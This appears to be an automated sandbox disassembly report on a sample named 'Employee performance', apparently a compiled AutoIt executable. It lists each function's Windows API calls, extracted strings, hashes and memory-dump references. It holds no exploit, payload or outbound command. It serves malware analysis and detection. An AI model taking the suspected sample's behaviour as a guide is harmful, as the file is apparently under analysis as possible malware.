String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 03149422caeb50688d55b9c89416bce381f9dc2a9f75a7a0cebacd6b1c248991
Instruction ID: 847077ee51822df20cdf0df127a12e3f7135d37732e26d49e1a9049acdcab4f2
Opcode Fuzzy Hash: 03149422caeb50688d55b9c89416bce381f9dc2a9f75a7a0cebacd6b1c248991
Instruction Fuzzy Hash: 23E1C1322542418FCB14DF28C85093EB7EABF88314B14899DF8D69B3AADB34ED45CB41

Function 00FE8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FE8968
GetSystemMetrics.USER32(00000007), ref: 00FE8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FE899B
GetSystemMetrics.USER32(00000008), ref: 00FE89A3
GetSystemMetrics.USER32(00000004), ref: 00FE89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FE89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FE89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FE8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FE8A3C
GetClientRect.USER32(00000000,000000FF), ref: 00FE8A5A
GetStockObject.GDI32(00000011), ref: 00FE8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00FE8A81

Part of subcall function 00FE912D: GetCursorPos.USER32(?), ref: 00FE9141
Part of subcall function 00FE912D: ScreenToClient.USER32(00000000,?), ref: 00FE915E
Part of subcall function 00FE912D: GetAsyncKeyState.USER32(00000001), ref: 00FE9183
Part of subcall function 00FE912D: GetAsyncKeyState.USER32(00000002), ref: 00FE919D

SetTimer.USER32(00000000,00000000,00000028,00FE90FC), ref: 00FE8AA8

Strings

AutoIt v3 GUI, xrefs: 00FE8A20

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: d12f93b8e39db3b9f19fcbc79a5bdad6fbec09333fa5fb118325a56213f03e93
Instruction ID: 41490ee076fb3da37e1ba7acbfe40458069257e9faec2b6a7bd32e07b6e2ca8d
Opcode Fuzzy Hash: d12f93b8e39db3b9f19fcbc79a5bdad6fbec09333fa5fb118325a56213f03e93
Instruction Fuzzy Hash: E6B1A075A0024AAFDF14DFA8DD45BAE3BB4FB48310F004229FA95A7294DB79D941CF50

Function 01030D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 010310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01031114
Part of subcall function 010310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,01030B9B,?,?,?), ref: 01031120
Part of subcall function 010310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01030B9B,?,?,?), ref: 0103112F
Part of subcall function 010310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01030B9B,?,?,?), ref: 01031136
Part of subcall function 010310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0103114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01030DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01030E29
GetLengthSid.ADVAPI32(?), ref: 01030E40
GetAce.ADVAPI32(?,00000000,?), ref: 01030E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 01030E96
GetLengthSid.ADVAPI32(?), ref: 01030EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 01030EB5
HeapAlloc.KERNEL32(00000000), ref: 01030EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 01030EDD
CopySid.ADVAPI32(00000000), ref: 01030EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01030F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01030F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 01030F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01030F6E
HeapFree.KERNEL32(00000000), ref: 01030F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01030F7E
HeapFree.KERNEL32(00000000), ref: 01030F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01030F8E
HeapFree.KERNEL32(00000000), ref: 01030F95
GetProcessHeap.KERNEL32(00000000,?), ref: 01030FA1
HeapFree.KERNEL32(00000000), ref: 01030FA8

Part of subcall function 01031193: GetProcessHeap.KERNEL32(00000008,01030BB1,?,00000000,?,01030BB1,?), ref: 010311A1
Part of subcall function 01031193: HeapAlloc.KERNEL32(00000000,?,00000000,?,01030BB1,?), ref: 010311A8
Part of subcall function 01031193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,01030BB1,?), ref: 010311B7

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 702ca66c9a2a8f01bc8cae3c0c93fcf803ec147bf6671a5ca34ff184eb63c867
Instruction ID: ac70894b7f71885295e8db43a5edd818989a79e8ed9ba1056220e8e878cfd0f2
Opcode Fuzzy Hash: 702ca66c9a2a8f01bc8cae3c0c93fcf803ec147bf6671a5ca34ff184eb63c867
Instruction Fuzzy Hash: 94717D7290120AAFEF209FA8DD44FEEBBBCBF46300F044155FA99E6194D7359905CB60

Function 0105C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0105C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0106CC08,00000000,?,00000000,?,?), ref: 0105C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0105C5A4
_wcslen.LIBCMT ref: 0105C5F4
_wcslen.LIBCMT ref: 0105C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0105C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0105C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0105C84D
RegCloseKey.ADVAPI32(?), ref: 0105C881
RegCloseKey.ADVAPI32(00000000), ref: 0105C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0105C960

Strings

REG_BINARY, xrefs: 0105C913
REG_QWORD, xrefs: 0105C8C3
REG_DWORD, xrefs: 0105C804
REG_SZ, xrefs: 0105C644
REG_MULTI_SZ, xrefs: 0105C6F5
REG_EXPAND_SZ, xrefs: 0105C5CD

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 5666f7aaa36476c03ca1041b02a681b77e6eb51332694b92dfb89cd90e7a4ae0
Instruction ID: 59057bb9cb61483ffeb1a057f444c47820baa0703fec2e80c740737b15a4a1c5
Opcode Fuzzy Hash: 5666f7aaa36476c03ca1041b02a681b77e6eb51332694b92dfb89cd90e7a4ae0
Instruction Fuzzy Hash: 58125C356043019FE754DF18C981B2AB7E5EF88714F08889DF98A9B3A2DB35ED41DB81

Function 0106091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 010609C6
_wcslen.LIBCMT ref: 01060A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01060A54
_wcslen.LIBCMT ref: 01060A8A
_wcslen.LIBCMT ref: 01060B06
_wcslen.LIBCMT ref: 01060B81

Part of subcall function 00FEF9F2: _wcslen.LIBCMT ref: 00FEF9FD

Part of subcall function 01032BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 01032BFA

Strings

ISCHECKED, xrefs: 01060CE1
UNCHECK, xrefs: 01060D3E
SELECT, xrefs: 01060D11
EXPAND, xrefs: 01060BF8
COLLAPSE, xrefs: 01060B01, 01060B1C
CHECK, xrefs: 01060A85, 01060AA0
GETTOTALCOUNT, xrefs: 010609F2, 01060A17
GETTEXT, xrefs: 01060C97
GETITEMCOUNT, xrefs: 01060C1E
GETSELECTED, xrefs: 01060C4E
EXISTS, xrefs: 01060B7C, 01060B97

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 20da5db7dd9c3565ff92320b3d7dc691928e7c7ba8647c1575e3d53f94252eb4
Instruction ID: a0a25b00d1f9e5556df84346574735ccf133f36db106403c23cebda246eae950
Opcode Fuzzy Hash: 20da5db7dd9c3565ff92320b3d7dc691928e7c7ba8647c1575e3d53f94252eb4
Instruction Fuzzy Hash: 54E1AF322483018FCB14EF29C85096EB7E6BF98354B048A9DF8D69B366D735ED45CB81

Function 0105C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0105B6AE,?,?), ref: 0105C9B5
_wcslen.LIBCMT ref: 0105C9F1
_wcslen.LIBCMT ref: 0105CA68
_wcslen.LIBCMT ref: 0105CA9E
_wcslen.LIBCMT ref: 0105CAF9
_wcslen.LIBCMT ref: 0105CB2F
_wcslen.LIBCMT ref: 0105CB7F

Strings

HKEY_LOCAL_MACHINE, xrefs: 0105CA62, 0105CA67
HKCU, xrefs: 0105CBCE
HKEY_CURRENT_USER, xrefs: 0105CBBD
HKLM, xrefs: 0105CA98, 0105CA9D
HKU, xrefs: 0105CBF0
HKCR, xrefs: 0105CB29, 0105CB2E
HKEY_CLASSES_ROOT, xrefs: 0105CAF3, 0105CAF8
HKEY_USERS, xrefs: 0105CBDF
HKCC, xrefs: 0105CBAC
HKEY_CURRENT_CONFIG, xrefs: 0105CB79, 0105CB7E

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 1c6bb14ccbd5e4042b39d3dde9fab7c3a8aae7d6cb4af9f7c7dc04268749db2d
Instruction ID: 1fb0249d2e73d02096c703647264d4d3a506943e1761f9eadcc8db54e42e8096
Opcode Fuzzy Hash: 1c6bb14ccbd5e4042b39d3dde9fab7c3a8aae7d6cb4af9f7c7dc04268749db2d
Instruction Fuzzy Hash: 4871053360022A8BEFA1DE6CCE505BF3BD9AF50654F140168FCD297286E635CD44E7A0

Function 0106833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0106835A
_wcslen.LIBCMT ref: 0106836E
_wcslen.LIBCMT ref: 01068391
_wcslen.LIBCMT ref: 010683B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 010683F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,01065BF2), ref: 0106844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 01068487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 010684CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 01068501
FreeLibrary.KERNEL32(?), ref: 0106850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0106851D
DestroyIcon.USER32(?,?,?,?,?,01065BF2), ref: 0106852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 01068549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 01068555

Strings

.exe, xrefs: 01068388
.dll, xrefs: 010683AB
.icl, xrefs: 01068368

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 94b7ae3f8f264c1053f4565b0ffb5bc597a0200c227bba9868062ac86299d2fd
Instruction ID: 44eb02f3ced6b39efe73b25b60a81a4ef62f1dd783f3b0ea91d8aad2b5696b58
Opcode Fuzzy Hash: 94b7ae3f8f264c1053f4565b0ffb5bc597a0200c227bba9868062ac86299d2fd
Instruction Fuzzy Hash: CB61E271540319BAEB24DF64CC41BBF77ACBF08710F10864AF995DA1D1DBB9AA80D7A0

Function 00FD7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#ce, xrefs: 00FD78ED
#include-once, xrefs: 00FD782F
Bad directive syntax error, xrefs: 0101519A
#pragma compile, xrefs: 00FD77D3
#OnAutoItStartRegister, xrefs: 00FD7817
#requireadmin, xrefs: 00FD77FF
#include, xrefs: 00FD7847
', xrefs: 01015169
", xrefs: 01015153
Cannot parse #include, xrefs: 01015279
Unterminated group of comments, xrefs: 0101528C
#comments-end, xrefs: 00FD78D9
#notrayicon, xrefs: 00FD77E7
#cs, xrefs: 00FD7873, 00FD78C5
#comments-start, xrefs: 00FD785F, 00FD78B1

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 7c4f41ed428a6791ac29759e4c171cf2bace02720a859dd8d91a002da8c19d8c
Instruction ID: dd11e5ed71e435b8aae832455fc88c422948806204761bce0584e702a4dd8a6f
Opcode Fuzzy Hash: 7c4f41ed428a6791ac29759e4c171cf2bace02720a859dd8d91a002da8c19d8c
Instruction Fuzzy Hash: B9811771A04305BBDB21BF64DC42FBE3BA9AF45300F084426F945AE256FB78D901E791

Function 01035A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 01035A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 01035A40
SetWindowTextW.USER32(?,?), ref: 01035A57
GetDlgItem.USER32(?,000003EA), ref: 01035A6C
SetWindowTextW.USER32(00000000,?), ref: 01035A72
GetDlgItem.USER32(?,000003E9), ref: 01035A82
SetWindowTextW.USER32(00000000,?), ref: 01035A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 01035AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 01035AC3
GetWindowRect.USER32(?,?), ref: 01035ACC
_wcslen.LIBCMT ref: 01035B33
SetWindowTextW.USER32(?,?), ref: 01035B6F
GetDesktopWindow.USER32 ref: 01035B75
GetWindowRect.USER32(00000000), ref: 01035B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 01035BD3
GetClientRect.USER32(?,?), ref: 01035BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 01035C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 01035C2F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 113402875e02e104cd8f5a1eed3da1268f02e1da423e8116e87155fe975016fc
Instruction ID: b2f1008970219e2be72f684e72127cab97b2ff0df8c440435f1442c60cd2b07b
Opcode Fuzzy Hash: 113402875e02e104cd8f5a1eed3da1268f02e1da423e8116e87155fe975016fc
Instruction Fuzzy Hash: 03717F31900709AFDB24DFA8CE85AAEBBF9FF88704F104558E5C2A25A4D779E940CF50

Function 00FF00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00FF00C6

Part of subcall function 00FF00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(010A070C,00000FA0,4BEA62FB,?,?,?,?,010123B3,000000FF), ref: 00FF011C
Part of subcall function 00FF00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,010123B3,000000FF), ref: 00FF0127
Part of subcall function 00FF00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,010123B3,000000FF), ref: 00FF0138
Part of subcall function 00FF00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00FF014E
Part of subcall function 00FF00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00FF015C
Part of subcall function 00FF00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00FF016A
Part of subcall function 00FF00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FF0195
Part of subcall function 00FF00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FF01A0

___scrt_fastfail.LIBCMT ref: 00FF00E7

Part of subcall function 00FF00A3: __onexit.LIBCMT ref: 00FF00A9

Strings

SleepConditionVariableCS, xrefs: 00FF0154
kernel32.dll, xrefs: 00FF0133
WakeAllConditionVariable, xrefs: 00FF0162
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00FF0122
InitializeConditionVariable, xrefs: 00FF0148

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: eae3c32527f0dbe6551159c1c393ca96b6560d3ea3fdaba258cfade685f6a03a
Instruction ID: 4c5f070fd86c93ff83d2e660dae58817f1397c531e44ce5170d22ef8fd53fe0f
Opcode Fuzzy Hash: eae3c32527f0dbe6551159c1c393ca96b6560d3ea3fdaba258cfade685f6a03a
Instruction Fuzzy Hash: 26213E32E45719ABE7306BA5AD05B7E3799EF05B60F00012AF9C1AB265DF799C009B50

Function 010330F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0103318D
_wcslen.LIBCMT ref: 010331F8

Strings

INSTANCE, xrefs: 01033453
REGEXPCLASS, xrefs: 01033255, 01033266
NAME, xrefs: 01033335, 01033346
CLASS, xrefs: 01033188, 010331A5
CLASSNN, xrefs: 010331F3, 01033204
TEXT, xrefs: 0103347C

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: cb1c7a7c7eb0ac5628ad9e20d27ee0ed61f66e6120bd5e4a89971c95b3defbdc
Instruction ID: 66f52825b4d4eb2556f94318b223c249ab64bcb22e0424c09669a07da256d8a3
Opcode Fuzzy Hash: cb1c7a7c7eb0ac5628ad9e20d27ee0ed61f66e6120bd5e4a89971c95b3defbdc
Instruction Fuzzy Hash: 9BE10632A001169BCF199F68C8917FEFBB8BF84710F14815AE5D6EB241DF30A945DB90

Function 010444C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0106CC08), ref: 01044527
_wcslen.LIBCMT ref: 0104453B
_wcslen.LIBCMT ref: 01044599
_wcslen.LIBCMT ref: 010445F4
_wcslen.LIBCMT ref: 0104463F
_wcslen.LIBCMT ref: 010446A7

Part of subcall function 00FEF9F2: _wcslen.LIBCMT ref: 00FEF9FD

GetDriveTypeW.KERNEL32(?,01096BF0,00000061), ref: 01044743

Strings

removable, xrefs: 010445EA, 010445EF
fixed, xrefs: 01044635, 0104463A
ramdisk, xrefs: 010446F1
network, xrefs: 0104469D, 010446A2
cdrom, xrefs: 0104458F, 01044594
unknown, xrefs: 01044708
all, xrefs: 01044531, 01044536

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 373dc7b2df3e4d5f7a4dedbfd6fcc2656b9688c630b6e54a63389acd5afc9642
Instruction ID: 3897bfe768af297ce158af8cb069bb4f11746d9a6f5dfe128e48b595aade8441
Opcode Fuzzy Hash: 373dc7b2df3e4d5f7a4dedbfd6fcc2656b9688c630b6e54a63389acd5afc9642
Instruction Fuzzy Hash: 35B1FEB16083029BC710DF28C8D0A6EB7E5BF99760F44496DF5D6C7292E734D845CBA2

Function 0105AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0105B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0105B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0105B1D4
_wcslen.LIBCMT ref: 0105B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0105B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0105B236
_wcslen.LIBCMT ref: 0105B332

Part of subcall function 010405A7: GetStdHandle.KERNEL32(000000F6), ref: 010405C6

